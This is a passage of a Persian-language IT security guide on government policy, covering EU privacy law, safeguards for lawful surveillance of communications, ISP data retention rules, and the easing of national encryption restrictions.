‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ‪ ،‬ﻭ‬
‫ﺷﻔﺎﻓﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ ".‬ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺳﻴﺎﺳﺖ ﺍﺻﻠﻲ ﺍﺗﺤﺎﺩﻳﻪ ﺍﺭﻭﭘﺎ ﺍﺳـﺖ‬
‫ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻨﺪ ‪ ۸‬ﻣﻌﺎﻫﺪﺓ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺣﻘـﻮﻕ ﺑـﺸﺮ ﻧﻴـﺰ‬
‫ﻣﺸﺨﺺ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﻨـﺪﻫﺎﻱ ‪ ۷‬ﻭ ‪ ۸‬ﻣﻨـﺸﻮﺭ ﺣﻘـﻮﻕ‬
‫ﺍﺳﺎﺳﻲ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ‪ ٨٦‬ﺍﺣﺘـﺮﺍﻡ ﺑـﻪ ﺣﻘـﻮﻕ ﺧـﺎﻧﻮﺍﺩﻩ ﻭ ﺯﻧـﺪﮔﻲ‬
‫ﺷﺨﺼﻲ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻋﻨﻮﺍﻥ ﻣـﻲﻧﻤﺎﻳـﺪ‪.‬‬
‫ﺩﺭ ﺟﻮﺍﻣﻊ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﺩﺭﺣﺎﻝ ﮔﺬﺍﺭ‪ ،‬ﻧﻈﺎﺭﺕ ﺑﻲﺣـﺪ ﻭ ﻣـﺮﺯ‬
‫ﻼ ﺍﺯ‬
‫ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻬﻮﻡ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﺭﺍ ﻛـﺎﻣ ﹰ‬
‫ﺑﻴﻦ ﺑﺒﺮﺩ‪.‬‬
‫ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺳﺘﺎ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺻﺮﺍﺣﺘﹰﺎ ﻋﻨﻮﺍﻥ ﻣﻲﻛﻨﺪ ﻛﻪ‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺗـﺎ ﺣـﺪﻱ‬
‫ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻨﺸﻮﺭ ﺣﻘـﻮﻕ‬
‫ﺑــﺸﺮ ﺍﺭﻭﭘــﺎﻳﻲ ﺁﻧــﺮﺍ ﻧﻘــﺾ ﻧﻜﻨــﺪ‪ .‬ﺑﻨــﺪ ‪ ۱۵‬ﻣﻌﺎﻫــﺪﺓ ﺟــﺮﺍﺋﻢ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٥٠‬‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺗﺠﺮﺑﻴـﺎﺕ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ‪،‬‬
‫ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪﻱ ﺩﺭ ﺍﻳــﻦ ﻣﻮﺿــﻮﻉ ﻫــﺴﺘﻨﺪ‪ .‬ﺑــﺮ ﺍﺳــﺎﺱ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺯﻳﺮ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﺩﻳﺎﺑﻲ‬
‫ﻗﺎﻧﻮﻧﻤﻨﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻣﻤﻜﻦ ﺳﺎﺯﻧﺪ‪:‬‬
‫•‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺭﺩﻳﺎﺑﻲ ﺷﻔﺎﻑ ﻭ ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻋﻤﻮﻡ‬
‫ﺑﺎﺷﻨﺪ؛ ﻭ ﺑﻄﻮﺭ ﻛﺎﻣـﻞ‪ ،‬ﺑـﺼﻮﺭﺕ ﺷـﻔﺎﻑ ﻭ ﺑـﺎ ﻣﻮﺷـﻜﺎﻓﻲ‬
‫ﻻﺯﻡ‪ ،‬ﺷﻬﺮﻭﻧﺪﺍﻥ ﺭﺍ ﺍﺯ ﭼﮕﻮﻧﮕﻲ ﻭ ﺷـﺮﺍﻳﻂ ﻧﻈـﺎﺭﺕ ﺁﮔـﺎﻩ‬
‫ﺳﺎﺯﻧﺪ؛‬
‫•‬
‫ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻣﻘﺎﻡ ﻣﺴﺘﻘﻞ‬
‫)ﺗﺮﺟﻴﺤﹰﺎ ﻳﻚ ﻗﺎﺿـﻲ( ﺻﻮﺭﺕ ﮔﻴـﺮﺩ ﻭ ﺑـﺮ ﺍﺳـﺎﺱ ﺗﻘﺎﺿـﺎﻱ‬
‫ﻛﺘﺒﻲ ﻭ ﺍﺭﺍﺋﻪ ﺩﻻﻳﻞ ﻭ ﺍﺳﻨﺎﺩ ﻣﻌﺘﺒﺮ ﻭ ﻗﺎﺑـﻞ ﻗﺒـﻮﻝ ﺍﻧﺠـﺎﻡ‬
‫ﺷﻮﺩ؛‬
‫•‬
‫ﻧﻈﺎﺭﺕ ﺗﻨﻬﺎ ﻣﺤـﺪﻭﺩ ﺑـﻪ ﺑﺮﺭﺳـﻲ ﺩﺭﮔﻴﺮﻳﻬـﺎﻱ ﺟـﺪﻱ ﻭ‬
‫ﺧﺎﺹ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﺗﺄﻳﻴﺪ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺕ ﻭﺟﻮﺩ ﺩﻻﻳﻞ ﻗـﻮﻱ ﻛـﻪ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ‬
‫ﻟﺰﻭﻡ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﺩﺭﺑﺎﺭﻩ ﺗﺨﻠﻔﺎﺕ ﺍﺳﺖ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ؛‬
‫•‬
‫ﺗﺄﻳﻴﺪ ﺭﺩﻳﺎﺑﻲ ﺗﻨﻬﺎ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺳﺎﻳﺮ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ؛‬
‫•‬
‫ﺍﺷﺨﺎﺹ ﻭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﺗﺤﺖ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺑﮕﻴﺮﻧـﺪ ﺑـﺎ‬
‫ﺟﺰﺋﻴﺎﺕ ﻛﺎﻣﻞ ﻣﺸﺨﺺ ﺷﻮﻧﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﺧـﺼﻮﺹ ﻣـﻮﺍﺭﺩ‬
‫ﻛﻠﻲ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﻧﺒﺎﺷﻨﺪ؛‬
‫•‬
‫ﺿﻮﺍﺑﻂ ﺍﺯ ﻧﻈﺮ ﻓﻨﺎﻭﺭﻱ ﺧﻨﺜﻲ ﺑﺎﺷﻨﺪ )ﺑﺎ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻋـﻢ‬
‫ﺍﺯ ﺗﻠﻔﻨﻲ‪ ،‬ﺗﺼﻮﻳﺮﻱ‪ ،‬ﺩﺍﺩﻩ ﺧﻄﻮﻁ ﺳـﻴﻤﻲ ﻳـﺎﺑﻲ ﺳـﻴﻢ‪ ،‬ﺩﻳﺠﻴﺘـﺎﻝ ﻳـﺎ‬
‫ﺁﻧﺎﻟﻮﮒ‪ ،‬ﺑﻪ ﻳﻚ ﺷﻜﻞ ﺑﺮﺧﻮﺭﺩ ﺷﺪﻩ ﺑﺎﺷﺪ(؛‬
‫•‬
‫ﺣﻮﺯﻩ ﻭ ﻣﺪﺕﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﻧﻈﺎﺭﺕ ﻣﺤﺪﻭﺩ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻫـﻴﭻ‬
‫ﻣﻮﺭﺩﻱ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺯﻣﺎﻥ ﻻﺯﻡ ﺑـﺮﺍﻱ ﻛـﺴﺐ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻮﺭﺩ ﻧﻈﺮ ﻧﺒﺎﺷﺪ؛‬
‫•‬
‫ﻞ ﻧﻘـﺾ ﺣـﺮﻳﻢ‬
‫ﻧﻈﺎﺭﺗﻬﺎ ﺑﻪ ﻃﺮﻳﻘﻲ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ ﻛﻪ ﺣﺪﺍﻗ ﹺ‬
‫ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻛﺎﺭﺑﺮﺩ ﺍﻃﻼﻋـﺎﺕ ﺣﺎﺻـﻞ ﺍﺯ ﺭﺩﻳـﺎﺑﻲ ﺭﺍ ﺗﻮﺿـﻴﺢ‬
‫ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ؛ ﻭ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺩﻳﮕـﺮﻱ ﺑﻜـﺎﺭ‬
‫ﻧﺮﻭﻧﺪ؛‬
‫•‬
‫ﻗﺎﻧﻮﻥ ﺭﻭﺍﻟﻬﺎﻱ ﺻـﺪﻭﺭ ﺣﻜـﻢ ﺑـﺮﺍﻱ ﻣـﺘﻬﻢ ﺭﺍ ﻣـﺸﺨﺺ‬
‫ﻛﺮﺩﻩ ﺑﺎﺷﺪ؛‬
‫•‬
‫ﻗﺎﻧﻮﻥ ﻣﻌﻴﻦ ﻛﻨﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺗﺤـﺖ ﺑﺮﺭﺳـﻲ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ‪ -‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻧﺘﻴﺠﺔ ﺣﺎﺻﻠﻪ ‪ -‬ﭘﺲ ﺍﺯ ﭘﺎﻳﺎﻥ‬
‫ﻛﺎﺭ ﺑﺎﻳﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻄﻠﻊ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ؛ ﻭ‬
‫•‬
‫ﭼﻨﺎﻧﭽﻪ ﻃﺒـﻖ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻛـﺴﻲ ﺩﺭ‬
‫ﺟﺮﻳﺎﻥ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺭﺩﻳﺎﺑﻲ ﻣـﻮﺭﺩ ﺗﺠـﺎﻭﺯ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪،‬‬
‫ﻃﺒﻖ ﻗﺎﻧﻮﻥ‪ ،‬ﺟﺒﺮﺍﻥ ﻛﻠﻴﺔ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﻟﺰﺍﻣﻲ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﺩﺭ ﺟﺮﻳـﺎﻥ ﺗﺤﻘﻴـﻖ ﻭ ﻫﻨﮕـﺎﻡ ﺗـﺼﺮﻑ‬
‫ﻋﻮﺍﻣﻞ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺩﺭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﺎﻳﺮ ﺍﺣﻜﺎﻡ ﺩﻭﻟﺖ‬
‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ )ﺍﺯ ﺟﻤﻠﻪ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ( ﺿﻮﺍﺑﻂ‬
‫ﺧﺎﺻﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺗﻠﻔﻨﻬﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺍﻋﻤﺎﻝ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﺩﺭ ﺑﻌﻀﻲ‬
‫ﻛﺸﻮﺭﻫﺎ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ )‪ISP‬ﻫـﺎ(‪ ٨٧‬ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺩﻭﻟﺖ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ‬
‫ﺍﻳﻦ ﺑﺮﺧﻲ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺩﺭﺻﺪﺩ ﺗﺼﻮﻳﺐ ﻗﻮﺍﻧﻴﻨﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮ‬
‫ﻣﺒﻨﺎﻱ ﺁﻥ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﻠﺰﻡ ﺑـﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎﻱ‬
‫ﺗﺮﺍﻓﻴﻜﻲ ﺩﺭ ﺗﻤﺎﻣﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺮﺍﻱ ﻳﻚ ﺣﺪﺍﻗﻞ ﺯﻣﺎﻧﻲ ﻣﻲﺑﺎﺷﻨﺪ‬
‫)ﺿﺎﺑﻄﻪﺍﻱ ﻛﻪ ﺑﻪ ﺁﻥ "ﻧﮕﻬﺪﺍﺭﻱ ﺩﺍﺩﻩﻫﺎ" ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ(‪ .‬ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ‬
‫ﺑﺴﻴﺎﺭ ﺑﺤﺚﺑﺮﺍﻧﮕﻴﺰ ﺑﻮﺩﻩ ﻭ ﺑـﻪ ﻋﻠـﺖ ﺗﻬﺪﻳـﺪ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ‬
‫ﺷﻬﺮﻭﻧﺪﺍﻥ‪ ،‬ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪﻫﺎ ﻭ ﺗﺤﻤﻴﻞ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ‬
‫ﺑﺮ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‪ ،‬ﻣﻮﺭﺩ ﺍﻧﺘﻘﺎﺩ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ‪ .‬ﺑﺮﺭﺳـﻲ‬
‫ﻛﺎﻣﻠﺘﺮ ﺿﻮﺍﺑﻂ ﻧﻈﺎﺭﺕ‪ ،‬ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻛﺘﺎﺏ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳـﻦ‬
‫ﻭﺟﻮﺩ ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛـﻪ ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﻪ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﻓﻨﻲ ﻭ ﺍﻟﺰﺍﻣﺎﺕ ﻧﮕﻬـﺪﺍﺭﻱ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺤﻤﻴـﻞ ﻧﻤـﻲﻛﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻌﺎﻫﺪﻩ ﺗﻨﻬﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ‪ ،‬ﺩﺳﺘﺮﺳـﻲ ﻳـﺎ ﺩﺳـﺘﻴﺎﺑﻲ‬
‫ﺑﻪﺩﺍﺩﻩﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨـﺪ ﻭ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ‬
‫ﺷﺮﻛﺘﻬﺎ ﺑﻬـﺮﻩ ﻣـﻲﺑـﺮﺩ‪ .‬ﺍﻳـﻦ ﺍﻣـﺮ ﻧﻴﺎﺯﻣﻨـﺪ ﺗﻐﻴﻴـﺮ ﻓﻨـﺎﻭﺭﻱ ﻳـﺎ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻧﻴﺴﺖ‪ .‬ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺩﺭﺑـﺎﺭﺓ‬
‫ﻣﺴﺎﺋﻞ ﺧـﺼﻮﺻﻲ ﺩﺭ ﺣـﻮﺯﺓ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻲ ﻣﻨﺘـﺸﺮ‬
‫ﺳﺎﺧﺖ ﻛـﻪ ﺑـﻪ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳـﺎﻳﻞ‬
‫ﻧﮕﻬــﺪﺍﺭﻱ ﺩﺍﺩﻩﻫــﺎ ﺭﺍ ﻣــﻲﺩﺍﺩ‪ ،‬ﺍﻣــﺎ ﺁﻧﻬــﺎ ﺭﺍ ﻣﻠــﺰﻡ ﺑــﻪ ﺍﻳﻨﻜــﺎﺭ‬
‫ﻧﻤﻲﺳﺎﺧﺖ‪.‬‬
‫‪Internet Service Providers‬‬
‫‪87‬‬
‫‪٢٥١‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﮔﻤﻨﺎﻣﻲ‬
‫‪٨٨‬‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٩١‬ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳـﺖ‪.‬‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻛﻤﻴـﺴﻴﻮﻥ ﺍﺭﻭﭘـﺎ ﺩﺭ ﺳـﺎﻝ ‪ ،۲۰۰۱‬ﻣﺘـﺬﻛﺮ ﺷـﺪ‪:‬‬
‫"ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﻮﻳﮋﻩ ﺑـﺎ ﺭﺷـﺪ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﺑﻲﺳﻴﻢ ﺿﺮﻭﺭﻱ ﺍﺳـﺖ"‪ .‬ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳـﻦ ﺍﻣـﺮ‪ ،‬ﺭﻭﻧـﺪ ﻛﻠـﻲ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺩﺭ ﺧﺼﻮﺹ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻳـﺪ ﻗـﻮﺍﻧﻴﻦ ﻣﺤـﺪﻭﺩ‬
‫ﻛﻨﻨﺪﺓ ﻛﺎﺭﺑﺮﺩ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺣـﺬﻑ ﻛﻨـﺪ ﻳـﺎ ﻛـﺎﻫﺶ ﺩﻫـﺪ‪ .‬ﺩﺭ‬
‫ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺑـﺪﻧﺒﺎﻝ‬
‫ﻛﻨﺘﺮﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻮﺩﻧﺪ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻧﺪ ﻛـﻪ ﺩﺭ ﺣﺎﻟـﺖ‬
‫ﻛﻠﻲ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﻣـﻲﺷـﻮﺩ‪ .‬ﺳﻴﺎﺳـﺖ‬
‫‪Anonymity‬‬
‫‪The Legitimity of Anonymous‬‬
‫‪Communications‬‬
‫‪Authentication‬‬
‫‪Encryption‬‬
‫‪88‬‬
‫‪89‬‬
‫‪90‬‬
‫‪91‬‬
‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪ ۱۹۹۰‬ﻛﺸﻮﺭﻫﺎﻱ ﻛﺎﻧﺎﺩﺍ‪ ،‬ﺁﻟﻤﺎﻥ‪ ،‬ﺍﻳﺮﻟﻨـﺪ ﻭ ﻓﻨﻼﻧـﺪ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ‪OECD‬‬
‫ﺗﻬﻴﻪ ﻛﺮﺩﻧﺪ‪ ،‬ﺗﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺭﺍﻳﮕﺎﻥ ﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻤـﻚ ﻛـﺮﺩﻩ‬
‫ﺑﺎﺷــﻨﺪ‪ .‬ﻓﺮﺍﻧــﺴﻪ ﻛــﻪ ﺳــﺎﺑﻘﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺩﺭ ﻣﺤــﺪﻭﺩﻛﺮﺩﻥ‬
‫ﻼ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺷﺖ ﺩﺭ ﮊﺍﻧﻮﻳﻪ ﺳﺎﻝ ‪ ۱۹۹۹‬ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺭﺍ ﻛـﺎﻣ ﹰ‬
‫ﺗﻐﻴﻴﺮ ﺩﺍﺩ ﻭ ﺍﻋﻼﻡ ﻛﺮﺩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﻣﺤـﺪﻭﻳﺖ‬
‫ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﺩﺭ ﺩﺳﺎﻣﺒﺮ ‪ ،۱۹۹۷‬ﺑﻠﮋﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﻝ ‪ ۱۹۹۴‬ﺧـﻮﺩ‬
‫ﺩﺭ ﺧﺼﻮﺹ ﻣﺤﺪﻭﺩﻳﺖ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍ ﺍﺻـﻼﺡ ﻧﻤـﻮﺩ‪ .‬ﺍﻳـﺎﻻﺕ‬
‫ﻣﺘﺤﺪﻩ ﻛﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺑﺎ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﺠﺎﺭﺕ ﻣﺤﺼﻮﻻﺕ ﻭ‬
‫ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻩ ﺑﻮﺩ‪ ،‬ﺗﻤﺎﻣﻲ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺍﻳﻦ‬
‫ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۰‬ﺭﻓﻊ ﻛﺮﺩ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﻭ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳـﻴﺪﻩﺍﻧـﺪ‬
‫ﻛﻪ ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣـﺆﺛﺮ ﺗﻬﺪﻳـﺪﺍﺕ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ ﻭ ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ‬
